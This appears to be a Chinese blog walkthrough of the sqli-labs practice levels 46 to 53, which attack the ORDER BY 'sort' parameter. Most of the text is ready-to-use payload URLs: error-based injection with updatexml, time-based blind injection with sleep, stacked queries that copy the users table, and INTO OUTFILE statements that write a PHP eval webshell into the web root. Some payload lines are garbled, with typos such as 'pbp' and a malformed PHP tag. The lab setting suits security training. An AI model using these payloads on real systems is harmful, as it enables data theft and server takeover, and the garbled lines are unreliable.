标签:图片 users 相同 这一 ase http length 一句话 sele
lines terminated
by xxx 以xxx为结尾:
select ‘<?php @eval($_ POST[crow]);?>‘ into outfile ‘C:\pbpstudy\PHPTutorilWWW.crow.pbp’ lines
terminated by 0x363636;
最后写好的文件会以666结尾。(详细可 参考: https://www.cnblogs. com/SZxiaochun/p/6027450.htmI
less46
根据提示 要输入sort字符
http://192.168.50.100/sqli-labs/Less-46/?sort=1 第一列数据进行了排列
http://192.168.50.100/sqli-labs/Less-46/?sort=2 第2列数据进行了排列 a--z
desc 降序
报错注入
http://192.168.50.100/sqli-labs/Less-46/?sort=1 and updatexml (1, concat(0x7e,database()) ,1)
延时注入
http://192.168.50.100/sqli-labs/Less-46/
?sort=1 and if(length(database())=7 ,1,sleep(5)) --+
less-47
基本与46关相同,就是order by ‘1’
less-48
基本与46关相同,但是这一关没有错误的回显,所以只能用盲注的办法:
延时盲注
http://192.168.50.100/sqli-labs/Less-48/
/?sort=1 and if(length(database())=8 ,1,sleep(5))
less-49
基本与46关相同,就是order by ‘1’,然后不显示报错,所以也可以用盲注的办法:
延时注入
http://192.168.50.100/sqli-labs/Less-49/?sort=1‘ and if(length(database())=8 ,1,sleep(5)) --+
less46-49的其他打开方式:使用函数写入一句话木马
这里以46关为例,我们首先使用outfile函数:
http://192.168.50.100/sqli-labs/Less-46/?sort=1 and (select ‘<php @eval($_POST["crow"];?>‘) into outfile ‘C:\\PhpStudy\\PHPTutorial\\WWW\\sqli-labs\\Less-46\\mm.php‘ --+
less-50
这一关大同小异:
方法一:延时注入
方法二:报错注入
方法三:写入一句话木马 以上三种方法参考上面。
方法四:使用堆叠注入创建新的users表:
http://192.168.0.105/sqli-labs/Less-50/?sort=1;create table ghz50 like users;insert into ghz50 select * from users;
方法五:使用堆叠注入写入一句话木马。
以上方法都可以,具体参考前几关的文章。
less-51
和50关基本相同,order by ’1‘语句数据包裹形式不同
方法一:延时注入
方法二:报错注入
方法三:写入一句话木马 以上三种方法参考上面。
方法四:使用堆叠注入创建新的users表。
方法五:使用堆叠注入写入一句话木马。
less-52
和50关基本相同,但是输出报错信息,所以不能用报错注入。
方法一:延时注入
方法二:写入一句话木马 以上三种方法参考上面。
方法三:使用堆叠注入创建新的users表。
方法四:使用堆叠注入写入一句话木马。
less-53
和50关基本相同,order by ’1‘语句数据包裹形式不同,而且没有输出报错信息的语句,所以不能用报错注入。
方法一:延时注入
方法二:写入一句话木马 以上三种方法参考上面。
方法三:使用堆叠注入创建新的users表。
方法四:使用堆叠注入写入一句话木马。
标签:图片 users 相同 这一 ase http length 一句话 sele
原文地址:https://www.cnblogs.com/xingyuner/p/12257448.html
